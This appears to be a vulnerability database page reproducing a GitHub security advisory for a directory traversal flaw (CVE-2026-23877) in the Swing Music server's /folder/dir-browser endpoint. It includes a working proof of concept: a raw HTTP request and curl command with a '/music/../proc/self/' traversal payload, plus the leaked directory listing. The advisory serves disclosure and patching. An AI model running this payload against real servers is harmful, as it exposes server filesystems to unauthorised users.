GHSA-PJ88-9XWW-GXMH

Vulnerability from github – Published: 2026-01-21 01:02 – Updated: 2026-01-21 01:02
VLAI?
Summary
Swing Music has a Directory Traversal & Filesystem can be accessed by a non-admin user
Details

Summary

Swing Music's list_folders() function in the /folder/dir-browser endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.

Details

The @api.post("/dir-browser") endpoint lacks proper path validation and authorization checks: - No authorization requirement: Any authenticated user can access the endpoint - Improper path handling: The code attempts to prepend "/" to non-existent paths but this doesn't prevent traversal:

req_dir = pathlib.Path("../../../../etc")  # → PosixPath('../../../../etc')
if not req_dir.exists():                    # → False
    req_dir = "/" / req_dir                 # → PosixPath('/../../../../etc')

PoC

  1. Create a non-admin user
  2. Authenticate as a non-admin user
  3. Send the following request:
POST /folder/dir-browser HTTP/1.1
Host: IP:1970
Content-Type: application/json
Cookie: access_token_cookie=non-admin-access-token
Connection: keep-alive

{"folder":"/music/../proc/self/", "tracks_only":false}

curl --path-as-is -i -s -k -X $'POST' -H $'Content-Type: application/json' -b $'access_token_cookie=non-admin-access-token' \
    --data-binary $'{\"folder\":\"/music/../proc/self/\", \"tracks_only\":false}' \
    $'http://IP:1970/folder/dir-browser'
  1. The response will list directories from /proc/self instead of restricting to user-accessible paths:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 466
Vary: Accept-Encoding
Connection: Keep-Alive

{"folders":[{"name":"attr","path":"/music/../proc/self/attr"},{"name":"cwd","path":"/music/../proc/self/cwd"},{"name":"fd","path":"/music/../proc/self/fd"},{"name":"fdinfo","path":"/music/../proc/self/fdinfo"},{"name":"map_files","path":"/music/../proc/self/map_files"},{"name":"net","path":"/music/../proc/self/net"},{"name":"ns","path":"/music/../proc/self/ns"},{"name":"root","path":"/music/../proc/self/root"},{"name":"task","path":"/music/../proc/self/task"}]}

Impact

Information Disclosure: - Server filesystem structure and layout - Configuration file locations and names - User account names from directory listings - Software versions and installed packages - Log file locations and system paths

Additional Risks: - Preparation for further attacks (LFI, RCE) - Bypass of access control mechanisms - Exposure of sensitive directory structures

Severity ?
5.3 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "swingmusic"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23877"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-25"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-21T01:02:29Z",
    "nvd_published_at": "2026-01-19T21:15:52Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nSwing Music\u0027s `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.\n\n### Details\nThe `@api.post(\"/dir-browser\")` endpoint lacks proper path validation and authorization checks:\n- **No authorization requirement**: Any authenticated user can access the endpoint\n- **Improper path handling**: The code attempts to prepend \"/\" to non-existent paths but this doesn\u0027t prevent traversal:\n```python\nreq_dir = pathlib.Path(\"../../../../etc\")  # \u2192 PosixPath(\u0027../../../../etc\u0027)\nif not req_dir.exists():                    # \u2192 False\n    req_dir = \"/\" / req_dir                 # \u2192 PosixPath(\u0027/../../../../etc\u0027)\n```\n\n### PoC\n1. Create a non-admin user\n2. Authenticate as a non-admin user\n3. Send the following request:\n```\nPOST /folder/dir-browser HTTP/1.1\nHost: IP:1970\nContent-Type: application/json\nCookie: access_token_cookie=non-admin-access-token\nConnection: keep-alive\n\n{\"folder\":\"/music/../proc/self/\", \"tracks_only\":false}\n```\n```bash\ncurl --path-as-is -i -s -k -X $\u0027POST\u0027 -H $\u0027Content-Type: application/json\u0027 -b $\u0027access_token_cookie=non-admin-access-token\u0027 \\\n    --data-binary $\u0027{\\\"folder\\\":\\\"/music/../proc/self/\\\", \\\"tracks_only\\\":false}\u0027 \\\n    $\u0027http://IP:1970/folder/dir-browser\u0027\n```\n4. The response will list directories from `/proc/self` instead of restricting to user-accessible paths:\n```\nHTTP/1.1 200 OK\nContent-Type: application/json\nContent-Length: 466\nVary: Accept-Encoding\nConnection: Keep-Alive\n\n{\"folders\":[{\"name\":\"attr\",\"path\":\"/music/../proc/self/attr\"},{\"name\":\"cwd\",\"path\":\"/music/../proc/self/cwd\"},{\"name\":\"fd\",\"path\":\"/music/../proc/self/fd\"},{\"name\":\"fdinfo\",\"path\":\"/music/../proc/self/fdinfo\"},{\"name\":\"map_files\",\"path\":\"/music/../proc/self/map_files\"},{\"name\":\"net\",\"path\":\"/music/../proc/self/net\"},{\"name\":\"ns\",\"path\":\"/music/../proc/self/ns\"},{\"name\":\"root\",\"path\":\"/music/../proc/self/root\"},{\"name\":\"task\",\"path\":\"/music/../proc/self/task\"}]}\n```\n\n### Impact\n\n**Information Disclosure:**\n- Server filesystem structure and layout\n- Configuration file locations and names\n- User account names from directory listings\n- Software versions and installed packages\n- Log file locations and system paths\n\n**Additional Risks:**\n- Preparation for further attacks (LFI, RCE)\n- Bypass of access control mechanisms\n- Exposure of sensitive directory structures",
  "id": "GHSA-pj88-9xww-gxmh",
  "modified": "2026-01-21T01:02:29Z",
  "published": "2026-01-21T01:02:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/swingmx/swingmusic/security/advisories/GHSA-pj88-9xww-gxmh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23877"
    },
    {
      "type": "WEB",
      "url": "https://github.com/swingmx/swingmusic/commit/9a915ca62af1502b9550722df82f5d432cb73de3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/swingmx/swingmusic"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Swing Music has a Directory Traversal \u0026 Filesystem can be accessed by a non-admin user"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.